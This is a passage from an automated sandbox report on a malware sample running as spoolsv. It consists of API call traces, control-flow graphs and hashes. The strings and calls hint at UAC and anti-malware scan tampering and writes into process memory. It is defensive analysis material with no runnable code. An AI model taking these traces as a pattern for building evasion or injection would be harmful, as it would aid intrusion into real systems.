                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: a297bb532582eea2dead0f3834fa86ed68ce71cfb470d0296401e5b04c65e6b3
                                                                              • Instruction ID: 15f6aa8c18e736209029873f2ff6309f338767204e6b9020b7871a9205268b97
                                                                              • Opcode Fuzzy Hash: a297bb532582eea2dead0f3834fa86ed68ce71cfb470d0296401e5b04c65e6b3
                                                                              • Instruction Fuzzy Hash: D7519D716213608FE715CF6C8988756BBE4EF46314F1886EEE54C8B283E770D549CBA1

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B3E436
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: CheckConnectionInternet
                                                                              • String ID: Initialize$OpenSession$ScanBuffer
                                                                              • API String ID: 3847983778-3852638603
                                                                              • Opcode ID: f0e6a0aa76deb1aa3fa0882e822370a066d30d3b7c8874af788cea894b860537
                                                                              • Instruction ID: 87b5f8aac0bf4865297372e4c9268adb8464a4e7bac210e0feb3c4906c76cae4
                                                                              • Opcode Fuzzy Hash: f0e6a0aa76deb1aa3fa0882e822370a066d30d3b7c8874af788cea894b860537
                                                                              • Instruction Fuzzy Hash: 27411235B102289FEB02EBA4CC40ADE73FAEF4C320F1144A6E555B7A50DA74ED098F60

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 5831 2b2e2ec-2b2e2f8 5832 2b2e307-2b2e30c 5831->5832 5833 2b2e2fa-2b2e300 VariantClear call 2b2dfb8 5831->5833 5834 2b2e30e-2b2e31b call 2b244ac 5832->5834 5835 2b2e31d-2b2e322 5832->5835 5840 2b2e305 5833->5840 5841 2b2e363-2b2e366 5834->5841 5838 2b2e324-2b2e32c 5835->5838 5839 2b2e32e-2b2e333 5835->5839 5838->5841 5843 2b2e335-2b2e33c call 2b2e170 5839->5843 5844 2b2e33e-2b2e349 call 2b32e2c 5839->5844 5840->5841 5843->5841 5850 2b2e357-2b2e35e VariantClear VariantInit 5844->5850 5851 2b2e34b-2b2e355 5844->5851 5850->5841 5851->5841
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 1473721057-0
                                                                              • Opcode ID: 5f4ed32e867129e1b64842fd0a611a34719714eb024ebffc4fd2714be8007d3a
                                                                              • Instruction ID: 0db8a70713f98934ff11d8c8b315910c536549d1c6c98f14e8d6901b0ffb0e56
                                                                              • Opcode Fuzzy Hash: 5f4ed32e867129e1b64842fd0a611a34719714eb024ebffc4fd2714be8007d3a
                                                                              • Instruction Fuzzy Hash: 46F0C82070433087C7227B3BCAC466D279AEF8974275094E6A49E5B145CB38FC4DCB56

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 5853 2b37064-2b370ae call 2b24eec 5856 2b370b0-2b370c2 call 2b2afd0 call 2b23e68 5853->5856 5857 2b370c7-2b370c9 5853->5857 5856->5857 5858 2b37290-2b372b7 5857->5858 5859 2b370cf-2b370e3 5857->5859 5862 2b372e1-2b372e4 5858->5862 5863 2b372b9-2b372c8 5858->5863 5864 2b370e5-2b370ff 5859->5864 5868 2b372e6-2b372e8 5862->5868 5869 2b372f5-2b37311 5862->5869 5866 2b372ca 5863->5866 5867 2b372cf-2b372df 5863->5867 5870 2b37101-2b37114 5864->5870 5871 2b37119-2b3711d 5864->5871 5866->5867 5867->5869 5868->5869 5872 2b372ea-2b372ee 5868->5872 5881 2b37316-2b37318 5869->5881 5873 2b37287-2b3728a 5870->5873 5874 2b37193-2b37195 5871->5874 5875 2b3711f-2b3712e 5871->5875 5872->5869 5878 2b372f0 5872->5878 5873->5858 5873->5864 5876 2b37197-2b3719b 5874->5876 5877 2b371dc-2b371e0 5874->5877 5879 2b37160-2b37188 call 2b2535c 5875->5879 5880 2b37130-2b3715e call 2b2535c 5875->5880 5882 2b371bf-2b371d7 5876->5882 5883 2b3719d-2b371a7 5876->5883 5884 2b371e2-2b371ea 5877->5884 5885 2b37255-2b3726c 5877->5885 5878->5869 5903 2b3718b-2b3718e 5879->5903 5880->5903 5887 2b37322-2b37327 5881->5887 5888 2b3731a-2b3731d call 2b3763c 5881->5888 5891 2b37283 5882->5891 5883->5882 5890 2b371a9-2b371ba call 2b2ea60 5883->5890 5892 2b3722a-2b37253 5884->5892 5893 2b371ec-2b37228 call 2b2535c 5884->5893 5885->5891 5895 2b3726e-2b37272 5885->5895 5898 2b37345-2b37357 5887->5898 5899 2b37329-2b37336 5887->5899 5888->5887 5890->5882 5891->5873 5892->5891 5893->5891 5895->5891 5904 2b37274-2b37280 5895->5904 5909 2b3736b 5898->5909 5910 2b37359-2b37369 SysFreeString 5898->5910 5905 2b37341-2b37343 5899->5905 5906 2b37338-2b3733c call 2b25338 5899->5906 5903->5891 5904->5891 5905->5898 5905->5899 5906->5905 5910->5909 5910->5910
                                                                              APIs
                                                                              • SysFreeString.OLEAUT32(?), ref: 02B37362
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: FreeString
                                                                              • String ID: H
                                                                              • API String ID: 3341692771-2852464175
                                                                              • Opcode ID: 92c1b8c24401f788b5abbdf6093ddad2fcc808e55ab4bdad5c95e72ef413b2c6
                                                                              • Instruction ID: c70031532c63ea4c85df135d9a737afb83b963aa93caefd034693b38b26fb0ec
                                                                              • Opcode Fuzzy Hash: 92c1b8c24401f788b5abbdf6093ddad2fcc808e55ab4bdad5c95e72ef413b2c6
                                                                              • Instruction Fuzzy Hash: 26B1F5B5A01608EFDB15CF99D880A9DFBF2FF4A314F1485A9E845AB360DB30A845DF50

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(00000000,00000000,02B3890B), ref: 02B38858
                                                                                • Part of subcall function 02B38020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38090,?,?,00000000,?,02B37A06,ntdll,00000000,00000000,02B37A4B,?,?,00000000), ref: 02B3805E
                                                                                • Part of subcall function 02B38020: GetModuleHandleA.KERNELBASE(?), ref: 02B38072
                                                                                • Part of subcall function 02B380C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38150,?,?,00000000,00000000,?,02B38069,00000000,KernelBASE,00000000,00000000,02B38090), ref: 02B38115
                                                                                • Part of subcall function 02B380C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B3811B
                                                                                • Part of subcall function 02B380C8: GetProcAddress.KERNEL32(?,?), ref: 02B3812D
                                                                                • Part of subcall function 02B37D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37D74
                                                                              • FreeLibrary.KERNEL32(74D80000,00000000,02B81388,Function_000065D8,00000004,02B81398,02B81388,05F5E0FF,00000040,02B8139C,74D80000,00000000,00000000,00000000,00000000,02B3890B), ref: 02B388EB
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule$AddressLibraryProc$FreeLoadMemoryVirtualWrite
                                                                              • String ID:
                                                                              • API String ID: 3283153180-0
                                                                              • Opcode ID: c7e58b9ffa88dcd06da3382756100ff1fe1eadf5de9e3c08846065a8ba1f2a9c
                                                                              • Instruction ID: c69f4b4dfd0035935a56effc7a314cf5a25c46424bee0c4accdc8aacfaf72f36
                                                                              • Opcode Fuzzy Hash: c7e58b9ffa88dcd06da3382756100ff1fe1eadf5de9e3c08846065a8ba1f2a9c
                                                                              • Instruction Fuzzy Hash: 33115EB0A51314BFEB01FBA8DC02A5E77AEEB45700F5048E4B60CF7A50DA349D06DB15

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 5939 2b2e6e8-2b2e6f5 5940 2b2e6f7-2b2e6f9 call 2b2e2ec 5939->5940 5941 2b2e6fe-2b2e705 5939->5941 5940->5941 5943 2b2e707-2b2e70e VariantCopy call 2b2dfb8 5941->5943 5944 2b2e715-2b2e71a 5941->5944 5950 2b2e713 5943->5950 5946 2b2e733-2b2e738 5944->5946 5947 2b2e71c-2b2e731 call 2b24500 5944->5947 5948 2b2e73a-2b2e74b 5946->5948 5949 2b2e74d-2b2e752 5946->5949 5955 2b2e78e-2b2e792 5947->5955 5948->5955 5953 2b2e764-2b2e76f call 2b32e2c 5949->5953 5954 2b2e754-2b2e762 call 2b2e514 5949->5954 5950->5955 5961 2b2e782-2b2e789 VariantCopy call 2b2dfb8 5953->5961 5962 2b2e771-2b2e780 5953->5962 5954->5955 5961->5955 5962->5955
                                                                              APIs
                                                                              • VariantCopy.OLEAUT32(00000000,00000000), ref: 02B2E709
                                                                                • Part of subcall function 02B2E2EC: VariantClear.OLEAUT32(?), ref: 02B2E2FB
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearCopy
                                                                              • String ID:
                                                                              • API String ID: 274517740-0
                                                                              • Opcode ID: e5676a1755a75309b90cab8539b6d3ca59021a6bd7bf634fa4d25abe065c1b6d
                                                                              • Instruction ID: 6a24addc3c64c60534c6ca0b95497f657ba9b2e3187c0b6708735f7b90534303
                                                                              • Opcode Fuzzy Hash: e5676a1755a75309b90cab8539b6d3ca59021a6bd7bf634fa4d25abe065c1b6d
                                                                              • Instruction Fuzzy Hash: 3C11A53070033087C722EF2ACDC466677EADF9975071558E6A94E8B269DB30EC4DCA62

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 5965 2b2e384-2b2e394 5966 2b2e3b3-2b2e3b7 5965->5966 5967 2b2e396-2b2e484 call 2b2e384 5965->5967 5969 2b2e3c0-2b2e3cc VariantInit 5966->5969 5970 2b2e3b9-2b2e3be 5966->5970 5972 2b2e3cf-2b2e3e8 5969->5972 5970->5972 5974 2b2e3ea 5972->5974 5975 2b2e3f8-2b2e3fd 5972->5975 5976 2b2e404-2b2e40b 5974->5976 5978 2b2e3ec-2b2e3ef 5974->5978 5975->5976 5977 2b2e3ff-2b2e402 5975->5977 5981 2b2e44f-2b2e460 5976->5981 5982 2b2e40d-2b2e41a call 2b374cd 5976->5982 5977->5976 5980 2b2e425-2b2e431 call 2b32e2c 5977->5980 5978->5976 5979 2b2e3f1-2b2e3f4 5978->5979 5979->5976 5983 2b2e3f6 5979->5983 5991 2b2e433-2b2e448 5980->5991 5992 2b2e44a call 2b2dc20 5980->5992 5986 2b2e462-2b2e46a call 2b2e794 5981->5986 5987 2b2e477 5981->5987 5988 2b2e420-2b2e423 5982->5988 5983->5980 5993 2b2e46f-2b2e472 call 2b2e368 5986->5993 5988->5981 5991->5981 5992->5981 5993->5987
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: InitVariant
                                                                              • String ID:
                                                                              • API String ID: 1927566239-0
                                                                              • Opcode ID: a4dea04e2e7903e78a0764818af872c462867a93cd37567e9a11f780bf7ba53b
                                                                              • Instruction ID: d976948470d667670e46464ca6c6be76682830012e7ecc97b61ec8c54799bd35
                                                                              • Opcode Fuzzy Hash: a4dea04e2e7903e78a0764818af872c462867a93cd37567e9a11f780bf7ba53b
                                                                              • Instruction Fuzzy Hash: 84317071A00328AFDB11DEAAC984AAE77E8EB0C305F4845A1F91DD3250D734F959CB62
                                                                              APIs
                                                                              • CLSIDFromProgID.OLE32(00000000,?,00000000,02B36D41,?,?,?,00000000), ref: 02B36D21
                                                                                • Part of subcall function 02B24C0C: SysFreeString.OLEAUT32(02B3E950), ref: 02B24C1A
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: FreeFromProgString
                                                                              • String ID:
                                                                              • API String ID: 4225568880-0
                                                                              • Opcode ID: 2d720c1e58d3758d73b5fe5ba76a14f7dfd571d7980fafb9c9d68dd804a4a34b
                                                                              • Instruction ID: 41b6d302fa6f39c36c1977f52525ec274e892466ca871185690e53a83bba2963
                                                                              • Opcode Fuzzy Hash: 2d720c1e58d3758d73b5fe5ba76a14f7dfd571d7980fafb9c9d68dd804a4a34b
                                                                              • Instruction Fuzzy Hash: 06E06531604314BBE702EBA5CC5195A7BBDEB49B50B9148F1F405D3510D974AD049864
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B25832
                                                                                • Part of subcall function 02B25A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B20000,02B4D790), ref: 02B25A94
                                                                                • Part of subcall function 02B25A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4D790), ref: 02B25AB2
                                                                                • Part of subcall function 02B25A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4D790), ref: 02B25AD0
                                                                                • Part of subcall function 02B25A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B25AEE
                                                                                • Part of subcall function 02B25A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B25B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B25B37
                                                                                • Part of subcall function 02B25A78: RegQueryValueExA.ADVAPI32(?,02B25CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B25B7D,?,80000001), ref: 02B25B55
                                                                                • Part of subcall function 02B25A78: RegCloseKey.ADVAPI32(?,02B25B84,00000000,?,?,00000000,02B25B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B25B77
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: Open$FileModuleNameQueryValue$Close
                                                                              • String ID:
                                                                              • API String ID: 2796650324-0
                                                                              • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                              • Instruction ID: ec2e068fef510ae88d5aa20802f0e3d832a6390947f2cf17fbe46fbc01d70543
                                                                              • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                              • Instruction Fuzzy Hash: 20E06D71A003248BCB24DE5C88C0A5637D8AB08750F4005A5EC58DF34AD3B0E9588BD0
                                                                              APIs
                                                                              • GetFileAttributesA.KERNEL32(00000000,?,02B3F8CC,ScanString,02B8137C,02B4AFD8,OpenSession,02B8137C,02B4AFD8,ScanString,02B8137C,02B4AFD8,UacScan,02B8137C,02B4AFD8,UacInitialize), ref: 02B27E23
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
                                                                              • Instruction ID: 2ca914ffa9beee75eeb70ce5ecafe2ffd6e15f9a7d78d45d258f77e7103503fb
                                                                              • Opcode Fuzzy Hash: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
                                                                              • Instruction Fuzzy Hash: 4CC08CA12023200B5A5071FC0CC402A428C8B051383A40FF5B53CD66D2DB25881E3431
                                                                              APIs
                                                                              • timeSetEvent.WINMM(00002710,00000000,02B4BB44,00000000,00000001), ref: 02B4BB60
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: Eventtime
                                                                              • String ID:
                                                                              • API String ID: 2982266575-0
                                                                              • Opcode ID: 6c17a46a9cbf44e852bc445029263b300936c6635a08ff1aef877ff4b992e613
                                                                              • Instruction ID: 6b7fce7b1d67a7e52844b140200aa9702da8ec1c7eee8109a1f7b1249f7f5a2b
                                                                              • Opcode Fuzzy Hash: 6c17a46a9cbf44e852bc445029263b300936c6635a08ff1aef877ff4b992e613
                                                                              • Instruction Fuzzy Hash: EAC092F1BC03103FF62056AC5CC2F27668DE704B08F601492BB04EE2D1D9E288641A64
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02B21A03,?,02B22000), ref: 02B215E2
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 74770d78a04eaccea8622cc4764d62a76287a81821f6db029c69c3f6f84861d8
                                                                              • Instruction ID: 6bc3129b6980054ab98f3620fc1b0261f8c5fa94a0e7c892ea6541d6774eab5c
                                                                              • Opcode Fuzzy Hash: 74770d78a04eaccea8622cc4764d62a76287a81821f6db029c69c3f6f84861d8
                                                                              • Instruction Fuzzy Hash: 97F0F9F0B513004FEB05DF7999443057AE6EB89389F1485B9E709DB399E771D4198B10
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02B22000), ref: 02B216A4
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2516090623.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                              • Associated: 00000005.00000002.2516035825.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516197158.0000000002B7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2516349983.0000000002C78000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b20000_spoolsv.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: ab99b24b78f9437852ee2238797199b8a2498a67ac7677a0514832296f9c264e
                                                                              • Instruction ID: 1d79b50b0c22cdc729b8ca095956cb85fbf158e4ba4bf49645a447c39a526727
                                                                              • Opcode Fuzzy Hash: ab99b24b78f9437852ee2238797199b8a2498a67ac7677a0514832296f9c264e
                                                                              • Instruction Fuzzy Hash: 33F090B6A407A56FD711AE5E9C80786BB94FB00394F054579F94CA7341D770A818CBD4
                                                                              APIs
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02B21FE4), ref: 02B21704
                                                                              Memory Dump Source
